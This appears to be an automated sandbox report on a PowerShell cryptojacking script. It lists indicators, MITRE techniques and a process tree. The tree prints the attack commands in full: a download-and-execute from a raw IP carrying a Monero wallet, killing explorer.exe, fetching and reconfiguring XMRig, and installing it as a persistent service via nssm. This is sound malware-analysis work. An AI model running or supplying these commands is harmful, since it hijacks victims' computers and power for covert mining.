xmrig | 339dcee55912f8910a3fb8b2c989986114ec299415cc9d77a2d217c3c0e31baa

Analysis

max time kernel
1200s
max time network
1202s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
05/07/2024, 07:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.ps1
Size

148B
MD5

a93e2838aae8e29492cb00e2c0a7f1e1
SHA1

88e3807f470b8958fb7ad94c670241a07a9e7a35
SHA256

339dcee55912f8910a3fb8b2c989986114ec299415cc9d77a2d217c3c0e31baa
SHA512

023342fbbfc4a2f6dcce2881777685d3b6c4879ebe8697a4e7f2cf1281f965fc7d39aacc08198a79e1dbcbee498ecee09070b118af638cc5125df9bdcc88b03b

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac3c-178.dat	family_xmrig
behavioral1/files/0x000700000001ac3c-178.dat	xmrig
behavioral1/memory/1996-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-471-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-487-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-488-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-489-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-490-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-491-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-492-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-493-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-494-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-495-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-496-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-497-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-499-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-500-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-501-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-502-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-503-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-504-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-505-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-506-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-507-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-508-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-509-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-510-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-511-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-512-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-513-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-514-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-515-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-516-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-517-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-518-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-519-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-520-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-521-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-522-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-523-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/4840-524-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	3368	powershell.exe
3	3940	powershell.exe
5	2400	powershell.exe
7	2380	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
1996	xmrig.exe
4148	nssm.exe
1260	nssm.exe
2804	nssm.exe
1068	nssm.exe
3116	nssm.exe
2456	nssm.exe
656	nssm.exe
4840	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3368	sc.exe
2936	sc.exe
2940	sc.exe
168	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3940	powershell.exe
2400	powershell.exe
4968	powershell.exe
4184	powershell.exe
4224	powershell.exe
3392	powershell.exe
364	powershell.exe
3368	powershell.exe
4008	powershell.exe
1808	powershell.exe
2120	powershell.exe
4644	powershell.exe
2380	powershell.exe
4708	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4248	Process not Found
1800	Process not Found
4012	timeout.exe
4632	timeout.exe
4548	timeout.exe
2072	timeout.exe
4892	timeout.exe
4024	timeout.exe
1068	Process not Found
2312	Process not Found
1792	Process not Found
2804	Process not Found
3092	Process not Found
3488	timeout.exe
4172	timeout.exe
4636	timeout.exe
64	timeout.exe
4352	Process not Found
4432	timeout.exe
4068	timeout.exe
4912	timeout.exe
4524	Process not Found
2912	Process not Found
3440	timeout.exe
4832	timeout.exe
4148	Process not Found
2652	Process not Found
2448	Process not Found
2080	Process not Found
4028	timeout.exe
3376	timeout.exe
2924	timeout.exe
4392	Process not Found
4008	Process not Found
4100	Process not Found
3832	Process not Found
3200	Process not Found
1152	timeout.exe
2804	timeout.exe
1336	timeout.exe
4168	timeout.exe
1976	timeout.exe
3432	timeout.exe
4364	timeout.exe
4620	timeout.exe
3392	timeout.exe
3880	timeout.exe
4052	timeout.exe
2620	timeout.exe
3784	timeout.exe
980	Process not Found
4620	Process not Found
3468	Process not Found
1068	timeout.exe
4896	timeout.exe
3188	timeout.exe
224	timeout.exe
4524	timeout.exe
4336	timeout.exe
220	timeout.exe
5004	timeout.exe
4328	timeout.exe
3552	timeout.exe
688	Process not Found

Kills process with taskkill 2 IoCs

evasion

pid	Process
2120	taskkill.exe
4572	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3368	powershell.exe
3368	powershell.exe
3368	powershell.exe
3940	powershell.exe
3940	powershell.exe
3940	powershell.exe
2400	powershell.exe
2400	powershell.exe
2400	powershell.exe
4968	powershell.exe
4968	powershell.exe
4968	powershell.exe
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
4224	powershell.exe
4224	powershell.exe
4224	powershell.exe
3392	powershell.exe
3392	powershell.exe
3392	powershell.exe
364	powershell.exe
364	powershell.exe
364	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
2380	powershell.exe
2380	powershell.exe
2380	powershell.exe
4008	powershell.exe
4008	powershell.exe
4008	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3368	powershell.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	4224	powershell.exe
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeDebugPrivilege	364	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	4008	powershell.exe
Token: SeLockMemoryPrivilege	4840	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4572	WMIC.exe
Token: SeSecurityPrivilege	4572	WMIC.exe
Token: SeTakeOwnershipPrivilege	4572	WMIC.exe
Token: SeLoadDriverPrivilege	4572	WMIC.exe
Token: SeSystemProfilePrivilege	4572	WMIC.exe
Token: SeSystemtimePrivilege	4572	WMIC.exe
Token: SeProfSingleProcessPrivilege	4572	WMIC.exe
Token: SeIncBasePriorityPrivilege	4572	WMIC.exe
Token: SeCreatePagefilePrivilege	4572	WMIC.exe
Token: SeBackupPrivilege	4572	WMIC.exe
Token: SeRestorePrivilege	4572	WMIC.exe
Token: SeShutdownPrivilege	4572	WMIC.exe
Token: SeDebugPrivilege	4572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4572	WMIC.exe
Token: SeRemoteShutdownPrivilege	4572	WMIC.exe
Token: SeUndockPrivilege	4572	WMIC.exe
Token: SeManageVolumePrivilege	4572	WMIC.exe
Token: 33	4572	WMIC.exe
Token: 34	4572	WMIC.exe
Token: 35	4572	WMIC.exe
Token: 36	4572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4572	WMIC.exe
Token: SeSecurityPrivilege	4572	WMIC.exe
Token: SeTakeOwnershipPrivilege	4572	WMIC.exe
Token: SeLoadDriverPrivilege	4572	WMIC.exe
Token: SeSystemProfilePrivilege	4572	WMIC.exe
Token: SeSystemtimePrivilege	4572	WMIC.exe
Token: SeProfSingleProcessPrivilege	4572	WMIC.exe
Token: SeIncBasePriorityPrivilege	4572	WMIC.exe
Token: SeCreatePagefilePrivilege	4572	WMIC.exe
Token: SeBackupPrivilege	4572	WMIC.exe
Token: SeRestorePrivilege	4572	WMIC.exe
Token: SeShutdownPrivilege	4572	WMIC.exe
Token: SeDebugPrivilege	4572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4572	WMIC.exe
Token: SeRemoteShutdownPrivilege	4572	WMIC.exe
Token: SeUndockPrivilege	4572	WMIC.exe
Token: SeManageVolumePrivilege	4572	WMIC.exe
Token: 33	4572	WMIC.exe
Token: 34	4572	WMIC.exe
Token: 35	4572	WMIC.exe
Token: 36	4572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5068	WMIC.exe
Token: SeSecurityPrivilege	5068	WMIC.exe
Token: SeTakeOwnershipPrivilege	5068	WMIC.exe
Token: SeLoadDriverPrivilege	5068	WMIC.exe
Token: SeSystemProfilePrivilege	5068	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4840	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3368 wrote to memory of 1040	3368	powershell.exe	74
PID 3368 wrote to memory of 1040	3368	powershell.exe	74
PID 1040 wrote to memory of 2120	1040	cmd.exe	76
PID 1040 wrote to memory of 2120	1040	cmd.exe	76
PID 1040 wrote to memory of 3940	1040	cmd.exe	78
PID 1040 wrote to memory of 3940	1040	cmd.exe	78
PID 3940 wrote to memory of 4916	3940	powershell.exe	79
PID 3940 wrote to memory of 4916	3940	powershell.exe	79
PID 4916 wrote to memory of 740	4916	cmd.exe	80
PID 4916 wrote to memory of 740	4916	cmd.exe	80
PID 740 wrote to memory of 420	740	net.exe	81
PID 740 wrote to memory of 420	740	net.exe	81
PID 4916 wrote to memory of 4840	4916	cmd.exe	82
PID 4916 wrote to memory of 4840	4916	cmd.exe	82
PID 4916 wrote to memory of 820	4916	cmd.exe	83
PID 4916 wrote to memory of 820	4916	cmd.exe	83
PID 4916 wrote to memory of 2132	4916	cmd.exe	84
PID 4916 wrote to memory of 2132	4916	cmd.exe	84
PID 4916 wrote to memory of 872	4916	cmd.exe	85
PID 4916 wrote to memory of 872	4916	cmd.exe	85
PID 4916 wrote to memory of 3268	4916	cmd.exe	86
PID 4916 wrote to memory of 3268	4916	cmd.exe	86
PID 4916 wrote to memory of 2936	4916	cmd.exe	87
PID 4916 wrote to memory of 2936	4916	cmd.exe	87
PID 4916 wrote to memory of 2940	4916	cmd.exe	88
PID 4916 wrote to memory of 2940	4916	cmd.exe	88
PID 4916 wrote to memory of 4572	4916	cmd.exe	89
PID 4916 wrote to memory of 4572	4916	cmd.exe	89
PID 4916 wrote to memory of 2400	4916	cmd.exe	90
PID 4916 wrote to memory of 2400	4916	cmd.exe	90
PID 4916 wrote to memory of 4968	4916	cmd.exe	91
PID 4916 wrote to memory of 4968	4916	cmd.exe	91
PID 4916 wrote to memory of 4708	4916	cmd.exe	92
PID 4916 wrote to memory of 4708	4916	cmd.exe	92
PID 4916 wrote to memory of 1996	4916	cmd.exe	93
PID 4916 wrote to memory of 1996	4916	cmd.exe	93
PID 4916 wrote to memory of 3188	4916	cmd.exe	94
PID 4916 wrote to memory of 3188	4916	cmd.exe	94
PID 3188 wrote to memory of 4644	3188	cmd.exe	95
PID 3188 wrote to memory of 4644	3188	cmd.exe	95
PID 4644 wrote to memory of 3532	4644	powershell.exe	96
PID 4644 wrote to memory of 3532	4644	powershell.exe	96
PID 4916 wrote to memory of 4184	4916	cmd.exe	97
PID 4916 wrote to memory of 4184	4916	cmd.exe	97
PID 4916 wrote to memory of 2120	4916	cmd.exe	98
PID 4916 wrote to memory of 2120	4916	cmd.exe	98
PID 4916 wrote to memory of 4224	4916	cmd.exe	99
PID 4916 wrote to memory of 4224	4916	cmd.exe	99
PID 4916 wrote to memory of 3392	4916	cmd.exe	100
PID 4916 wrote to memory of 3392	4916	cmd.exe	100
PID 4916 wrote to memory of 364	4916	cmd.exe	101
PID 4916 wrote to memory of 364	4916	cmd.exe	101
PID 4916 wrote to memory of 1808	4916	cmd.exe	102
PID 4916 wrote to memory of 1808	4916	cmd.exe	102
PID 4916 wrote to memory of 2380	4916	cmd.exe	103
PID 4916 wrote to memory of 2380	4916	cmd.exe	103
PID 4916 wrote to memory of 4008	4916	cmd.exe	104
PID 4916 wrote to memory of 4008	4916	cmd.exe	104
PID 4916 wrote to memory of 168	4916	cmd.exe	105
PID 4916 wrote to memory of 168	4916	cmd.exe	105
PID 4916 wrote to memory of 3368	4916	cmd.exe	106
PID 4916 wrote to memory of 3368	4916	cmd.exe	106
PID 4916 wrote to memory of 4148	4916	cmd.exe	107
PID 4916 wrote to memory of 4148	4916	cmd.exe	107

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_6b0a8929.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp754F.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4916
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:740
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:420
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:4840
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:820
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:2132
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:872
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:3268
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:2936
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:2940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4708
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:1996
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3188
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4644
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:3532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4184
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2120
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Dfzpkzrm\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3392
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:364
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4008
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:168
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3368
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4148
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:1260
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:2804
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:1068
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:3116
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5068
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3440
